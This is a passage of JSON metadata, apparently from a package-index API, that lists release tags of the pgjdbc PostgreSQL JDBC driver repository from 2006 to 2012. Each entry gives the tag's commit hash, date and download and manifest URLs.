ind":"tag","published_at":"2012-11-14T21:54:26.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_2_1001","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_2_1001","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_2_1001","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1001","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1001/manifests"},{"name":"REL9_2_1002","sha":"f9c2e98d9c80abb2b04690c8bc0c16f11a797c79","kind":"tag","published_at":"2012-11-14T21:29:49.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_2_1002","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_2_1002","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_2_1002","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1002","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1002/manifests"},{"name":"REL9_1_903","sha":"3fdf1a0f4f533a1bdf59e7e0f3e5e49656d30d5b","kind":"commit","published_at":"2012-09-27T14:08:01.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_1_903","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_1_903","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_1_903","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_1_903","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_1_903/manifests"},{"name":"list","sha":"1f0403ea22970855e6a4f3164180ac7077cfebdf","kind":"commit","published_at":"2012-05-02T18:12:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/list","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/list","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@list","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/list","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/list/manifests"},{"name":"REL9_1_902","sha":"557d6f329197b293b2220fb7ebf0be3709c06f88","kind":"commit","published_at":"2012-04-26T01:42:59.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_1_902","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_1_902","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_1_902","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_1_902","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_1_902/manifests"},{"name":"REL9_1_901","sha":"928f33efecaf0c541b95e3c9e8404f7ba617d0eb","kind":"commit","published_at":"2011-09-11T01:38:06.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_1_901","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_1_901","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_1_901","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_1_901","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_1_901/manifests"},{"name":"REL9_0_802","sha":"6b3a04fc10e71ff4affd6624a53d24b3fad20999","kind":"commit","published_at":"2011-09-11T01:18:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_0_802","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_0_802","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_0_802","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_0_802","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_0_802/manifests"},{"name":"REL8_4_703","sha":"8f4050a1ec42b9db646193381db2a3e6bb981c75","kind":"commit","published_at":"2011-09-11T01:17:07.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_4_703","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_4_703","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_4_703","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_4_703","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_4_703/manifests"},{"name":"REL8_3_607","sha":"87173901b381a34c0010b3b4d45223c40ef1c76f","kind":"commit","published_at":"2011-09-11T01:14:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_3_607","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_3_607","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_3_607","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_607","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_607/manifests"},{"name":"REL8_2_512","sha":"2765d2fe73dcab4016950ec63857e530087464d1","kind":"commit","published_at":"2011-09-10T04:24:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_512","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_512","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_512","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_512","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_512/manifests"},{"name":"REL9_0_801","sha":"2e39cc38ddc3ba8028f0acd45bad69dc4d3d691b","kind":"commit","published_at":"2010-09-20T21:32:37.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_0_801","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_0_801","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_0_801","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_0_801","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_0_801/manifests"},{"name":"REL8_0_325","sha":"f7842c2feb40e7e7549f2ed54fb3df1cd4ef7386","kind":"commit","published_at":"2010-05-12T06:41:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_325","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_325","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_325","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_325","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_325/manifests"},{"name":"REL8_1_415","sha":"1219f0e80e5662997d460cb28148577c71e00432","kind":"commit","published_at":"2010-05-12T06:40:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_415","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_415","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_415","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_415","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_415/manifests"},{"name":"REL8_2_511","sha":"f597791a65c8c277c7cdb2a92709637352b1fde7","kind":"commit","published_at":"2010-05-12T06:40:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_511","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_511","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_511","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_511","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_511/manifests"},{"name":"REL8_3_606","sha":"5e1cb768622fcf53818de0318004166d1c942587","kind":"commit","published_at":"2010-05-12T06:39:47.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_3_606","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_3_606","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_3_606","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_606","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_606/manifests"},{"name":"REL8_4_702","sha":"034baa3e624ac87b11111480d1b4e35a2583a854","kind":"commit","published_at":"2010-05-12T06:36:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_4_702","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_4_702","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_4_702","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_4_702","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_4_702/manifests"},{"name":"REL8_0_324","sha":"a69999ff3b80ceb3777817d08496468edc725765","kind":"commit","published_at":"2009-07-01T05:16:24.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_324","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_324","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_324","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_324","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_324/manifests"},{"name":"REL8_1_414","sha":"ca013de95da92dadb9fafc940029fe15757ae2af","kind":"commit","published_at":"2009-07-01T05:16:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_414","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_414","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_414","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_414","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_414/manifests"},{"name":"REL8_2_510","sha":"a722ade8395fb287471001e0246f190a2b859552","kind":"commit","published_at":"2009-07-01T05:16:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_510","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_510","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_510","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_510","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_510/manifests"},{"name":"REL8_3_605","sha":"577936d8d7f7e9a1b6c7d725a96513a9b19498e3","kind":"commit","published_at":"2009-07-01T05:16:04.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_3_605","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_3_605","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_3_605","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_605","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_605/manifests"},{"name":"REL8_4_701","sha":"05af6314b92554e30034d49426b941ce621f9dee","kind":"commit","published_at":"2009-07-01T05:15:53.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_4_701","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_4_701","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_4_701","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_4_701","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_4_701/manifests"},{"name":"REL8_0_323","sha":"f2873cda04abcfb05695501c88dbee6bcd41d046","kind":"commit","published_at":"2008-11-16T13:46:05.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_323","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_323","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_323","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_323","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_323/manifests"},{"name":"REL8_1_413","sha":"2eb09ad9c7b2fddc88b4a87598f3734d4d2b433e","kind":"commit","published_at":"2008-11-16T13:45:57.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_413","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_413","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_413","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_413","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_413/manifests"},{"name":"REL8_2_509","sha":"3b35c0939abce6f600d19312c644475db6d0d4bd","kind":"commit","published_at":"2008-11-16T13:45:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_509","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_509","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_509","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_509","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_509/manifests"},{"name":"REL8_3_604","sha":"f8e3280f3cee126b0ad765fbdac92b40b784d469","kind":"commit","published_at":"2008-11-16T13:45:43.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_3_604","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_3_604","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_3_604","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_604","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_604/manifests"},{"name":"REL8_0_322","sha":"b3bc99ec992aa793817539a726416ed8c8df38cc","kind":"commit","published_at":"2008-01-31T09:55:58.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_322","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_322","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_322","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_322","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_322/manifests"},{"name":"REL8_1_412","sha":"c29d8b99429462a17d7ba0b8e8f6daedab92e80e","kind":"commit","published_at":"2008-01-31T09:55:40.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_412","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_412","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_412","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_412","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_412/manifests"},{"name":"REL8_2_508","sha":"2566771421d25f8b674a932e182e671504ce0480","kind":"commit","published_at":"2008-01-31T09:55:21.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_508","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_508","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_508","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_508","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_508/manifests"},{"name":"REL8_3_603","sha":"8a2eef81e45d07130e2d86bc8a18cc14642e2741","kind":"commit","published_at":"2008-01-31T09:54:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_3_603","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_3_603","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_3_603","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_603","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_603/manifests"},{"name":"REL8_0_321","sha":"4d7ea8b0061ef946705cbd46ee70cb5984f3a5e7","kind":"commit","published_at":"2007-12-02T08:31:06.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_321","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_321","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_321","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_321","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_321/manifests"},{"name":"REL8_1_411","sha":"4f487c433534b25222a81f7e80394ef3d52d72fe","kind":"commit","published_at":"2007-12-02T08:30:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_411","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_411","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_411","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_411","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_411/manifests"},{"name":"REL8_2_507","sha":"9f13dae31b5fdf75abd1552ec590749bf09e052d","kind":"commit","published_at":"2007-12-02T08:30:31.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_507","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_507","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_507","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_507","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_507/manifests"},{"name":"REL8_0_320","sha":"a72e305c0133dd8b962ab06cb991b44927317dd9","kind":"commit","published_at":"2007-07-31T06:07:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_320","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_320","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_320","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_320","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_320/manifests"},{"name":"REL8_1_410","sha":"5619f9ef751da6bfa6b619cf62716bb315f7eba8","kind":"commit","published_at":"2007-07-31T06:06:35.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_410","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_410","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_410","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_410","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_410/manifests"},{"name":"REL8_2_506","sha":"12eceb1ff7a04d25bf74bda80a59f37ac53110a3","kind":"commit","published_at":"2007-07-31T06:06:12.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_506","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_506","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_506","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_506","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_506/manifests"},{"name":"REL8_2_505","sha":"91879290313ab6f64e05f9f366c368dc8419516c","kind":"commit","published_at":"2007-04-18T08:15:18.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_505","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_505","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_505","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_505","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_505/manifests"},{"name":"REL8_1_409","sha":"ef22d89fe798811a7ac7a143b0620043eb0acd00","kind":"commit","published_at":"2007-04-18T08:14:29.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_409","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_409","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_409","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_409","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_409/manifests"},{"name":"REL8_0_319","sha":"859fe40b52d5e8c44184c19015bd1836478c7355","kind":"commit","published_at":"2007-04-18T08:13:26.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_319","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_319","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_319","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_319","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_319/manifests"},{"name":"REL8_2_504","sha":"80b0ce1be968813de3d56ff1670857015ce6862f","kind":"commit","published_at":"2006-12-01T12:02:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_504","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_504","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_504","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_504","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_504/manifests"},{"name":"REL8_1_408","sha":"db52e0e583a7b8af7c7d5da34f50c8f965baec6f","kind":"commit","published_at":"2006-12-01T11:57:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_408","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_408","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_408","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_408","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_408/manifests"},{"name":"REL8_0_318","sha":"50466b1014fd76ec445abe26b234c13dc7c0f338","kind":"commit","published_at":"2006-12-01T11:54:54.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_318","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_318","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_318","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_318","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_318/manifests"},{"name":"REL8_0_317","sha":"7bab436cbec9baec3cd36c6d320cdc4402fd718c","kind":"commit","published_at":"2006-05-23T23:07:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_317","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_317","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_317","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_317","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_317/manifests"},{"name":"REL8_1_407","sha":"d9e844e0f120b4401e178392c6d4293ac5e7d3cd","kind":"commit","published_at":"2006-05-23T23:07:09.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_407","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_407","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_407","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_407","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_407/manifests"},{"name":"REL8_0_316","sha":"027669dc50a5266603